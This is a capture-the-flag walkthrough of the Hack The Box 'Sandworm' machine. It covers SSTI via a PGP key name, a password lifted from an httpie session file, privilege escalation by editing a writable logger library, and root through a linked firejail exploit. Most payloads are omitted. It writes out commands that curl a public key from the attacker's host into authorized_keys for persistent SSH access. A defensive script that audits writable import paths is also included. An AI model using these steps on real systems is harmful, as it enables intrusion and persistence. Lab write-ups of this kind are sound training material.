Sandworm
https://app.hackthebox.com/machines/Sandworm
from hackthebox
Port scan
There were no interesting directories to further investigate.
Foothold
After further enumeration, the best page to further pwn was
/guide
Here, we can verify a PGP signature against our public key.
Now we create our own public key and signature and verify them here.
Finding web vuln
After we create our signature and public key, let's check them out on the website.
We can see that our name is echoed out. Maybe an SSTI vulnerability.
We have to manipulate the name parameter. Let's edit our key.
Exploitation
Enter the following command :
To select the uid, enter the number shown next to your key. A * will appear once it is selected.
Creating payload :
The blue line denotes the command, the yellow denotes the payload.
Create a signed message :
Export public key
SSTI
We can confirm that SSTI can be exploited here.
Repeat the steps with your own payload
The one I used was :
And we got the shell
User shell
After a while, I found an interesting file which had the password of the user.
~/.config/httpie/sessions/localhost_5000/admin.json
SSH with the creds
DONE
Privilege Escalation (2)
Source code of the running application
It's using a logger library, and fortunately we have write access to that library.
Path of the logger library :
Let's edit the library code
Wait a few minutes (less than 2 minutes) to get the shell.
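The weakness behind this step is a module that a privileged process imports from a location a low-privileged user can write. As an added, defender-side example (not part of the original writeup; the paths and file modes are constructed), this audit flags .py files, or the directories holding them, that are group- or world-writable on a given import path:

```python
import os
import stat
import sys
import tempfile
from pathlib import Path

# Assumption: POSIX permissions; for a real audit pass the sys.path of the
# privileged process (here the logger import of the root job) instead.

def writable_by_others(path: Path) -> bool:
    """True if the group or world write bit is set on path."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_import_paths(search_path):
    """Return (file, reason) for every .py module a non-owner could modify.

    A writable module file, or a writable directory that lets the file be
    replaced, is enough: the next time the privileged job imports it,
    whatever was written into it runs with that job's privileges.
    """
    findings = []
    for entry in search_path:
        root = Path(entry)
        if not root.is_dir():
            continue
        for module in sorted(root.rglob("*.py")):
            if writable_by_others(module):
                findings.append((str(module), "file is group/world writable"))
            if writable_by_others(module.parent):
                findings.append((str(module), "containing directory is group/world writable"))
    return findings

def demo():
    """Constructed fixture: a safe package, one with a group-writable module
    file, one with a world-writable package directory. Returns relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "site-packages"
        cases = {  # relative module path: (directory mode, file mode)
            "safe_pkg/__init__.py": (0o755, 0o644),
            "logger_pkg/logger.py": (0o755, 0o664),
            "sloppy_pkg/__init__.py": (0o777, 0o644),
        }
        for rel, (dir_mode, file_mode) in cases.items():
            f = lib / rel
            f.parent.mkdir(parents=True)
            f.write_text("# constructed module\n")
            os.chmod(f, file_mode)
            os.chmod(f.parent, dir_mode)
        return [(str(Path(p).relative_to(lib)), why)
                for p, why in audit_import_paths([lib])]

if __name__ == "__main__":
    for path, why in audit_import_paths(sys.path):
        print(f"{path}: {why}")
```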
Privilege Escalation (root)
We are going to use this script to get root
https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
We can add our ssh keys into the remote machine for a better shell experience. Create your own key with :
Copy the
~/.ssh/id_rsa.pub
into the remote machine under ~/.ssh/
I used curl to download the file since vim was not working properly (maybe stabilize the shell and resume)
mkdir -p ~/.ssh
curl <your-ip>/id_rsa.pub -o ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
Boom, we just need to ssh in now and run the script. I used curl again to copy the script from my local machine to the remote machine.
Run the
firejail --join=<id>
command as prompted in another ssh shell. Now run
su -
or su
for the root shell.
heapbyte's still pwning.